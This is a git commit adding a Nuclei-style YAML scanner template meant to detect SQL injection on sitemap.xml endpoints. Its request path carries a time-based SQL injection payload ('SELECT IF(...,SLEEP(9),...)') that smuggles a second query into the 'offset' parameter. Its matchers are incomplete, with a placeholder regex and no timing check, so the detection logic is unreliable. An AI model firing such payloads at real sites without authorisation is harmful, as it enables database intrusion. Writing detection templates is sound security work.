sitemap-sql

It will be useful to detect sql on the sitemap.xml endpoints or extensions
patch-1
B Aravind 2023-06-09 17:49:42 +05:30
parent 34f63c93de
commit 79ddc770b7
1 changed files with 18 additions and 0 deletions

View File

@ -0,0 +1,18 @@
id: sql-injection
info:
name: SQL Injection
author: Aravind
severity: high
tags: [web, injection, sql]
requests:
- method: GET
path:
- "{{BaseURL}}/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#"
matchers-condition: or
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex: "Expected response content or regex here"